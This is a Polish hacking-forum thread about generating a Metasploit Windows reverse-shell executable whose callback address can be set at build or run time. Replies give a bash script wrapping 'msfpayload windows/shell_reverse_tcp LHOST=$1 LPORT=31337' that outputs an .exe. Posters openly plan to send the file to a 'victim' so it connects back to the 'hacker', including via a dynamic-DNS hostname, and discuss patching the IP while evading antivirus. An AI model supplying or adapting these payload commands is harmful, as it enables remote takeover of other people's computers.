Ocena wątku:
  • 0 głosów - średnia: 0
  • 1
  • 2
  • 3
  • 4
  • 5
Payload ze zmiennym LHOSTem
#1
Witam, 
wie ktoś może jak wygenerować przez msfpayload ładunek, ale tak żeby można było podawać mu jako argumenty adres IP z którym ma się łączyć. Bo podczas generowania wpisuje się LHOST i potem już go nie można zmieniać. :/
Myślałem czy może coś w stylu: payload.exe 123.234.345.567    
Adres podawany z wywołaniem programu.
Pozdro. 
The quieter, the better.
Odpowiedz
#2
może to rozwiązanie jest powolne ale skrypt w bashu zawierający np to:
msfpayload windows/shell_reverse_tcp LHOST=$1 LPORT=31337 X > /tmp/1.exe (wrzuć to do pliku skrypt.sh)
powinien wystarczyć
i wywołując skrypt w bashu podajesz w terminalu ./skrypt.sh 123.234.345.567
Odpowiedz
#3
Oki Smile dzięki Smile a wywołując ten skrypt podaje chyba nazwa.exe 123.234.345.567 ? Bo to na windowsie jest odpalane. Mam rację?
The quieter, the better.
Odpowiedz
#4
na linuxie odpalasz skrypt i ten skrypt tworzy ci plik.exe Smile
Odpowiedz
#5
Jak to? Smile przecież ładunek się tworzy potem jakoś zgrywa na kompa ofiary (windows) i odpala. Wtedy on łączy się z Twoim kompem na którym był włączony nasłuch i git.
Więc to na kompie ofiary wpisuje: nazwa_ładunku.exe ip_hakiera Smile czy nie? Big Grin
The quieter, the better.
Odpowiedz
#6
no tak tzn mi chodziło o ten skrypt odpala sie na linuxie i on ci tworzy plik exe który wysyłasz i odpalasz na windowsie Big Grin

jak chcesz wywołując skrypt podać nazwe i ip to dajesz w pliku
msfpayload windows/shell_reverse_tcp LHOST=$1 LPORT=31337 X > /tmp/$2
i odpalasz go ./skrypt.sh ip_hakiera nazwa_ładunku.exe
troche zagmatwałem to Smile
Odpowiedz
#7
Ahaa Big Grin to to wiem Smile Dobra dzięki. Daję + Smile
The quieter, the better.
Odpowiedz
#8
Hmm, tak teraz myślę, czy to na pewno działa tak jak chcę ? Smile dajmy na to że wysyłam plik komuś, on ma go odpalić i połączyć się ze mną. Ale ja nie mam stałego IP, wiec załatwiłem sobie nazwę dla mojego zmiennego IP (no-ip.pl). Jestem widoczny pod np. bleble.no-ip.pl. Tego adresu jednak nie wpiszę w LHOST, więc mam program który z nazwy bleble.no-ip.pl robi mi adres IP i zwraca go. Ten adres chcę żeby był zwracany jako argument do payloadu. Payload odpalany jest na kompie ofiary. Hmm najpierw powinien się uruchomić program sprawdzający IP bleble.no-ip.pl przekazać IP do payloadu, który by się połączyć. Trochę się zagmatwałem.
The quieter, the better.
Odpowiedz
#9
może dodaj np program w c++ który sprawdza jaki masz host i generuje każdorazowo przy uruchomieniu komputera payload z ip innym hmm... tylko jak to zrobić na win bez dużych rozmiarów? może gdy nie jest payload zakodowany to w którymś miejscu w nim jest fizycznie wpisany adres w sensie że można tą wartość zmienić hexdecymalnie w c++? ale wtedy każdy antywirus go wykryje...
Odpowiedz
#10
A no, ciężko...
The quieter, the better.
Odpowiedz


Podobne wątki
Wątek: Autor Odpowiedzi: Wyświetleń: Ostatni post
  Szyfrowany payload Kamil++ 6 1,611 06-18-2014, 17:05
Ostatni post: GarbatyAniol

Skocz do:


Użytkownicy przeglądający ten wątek: 1 gości
stat4u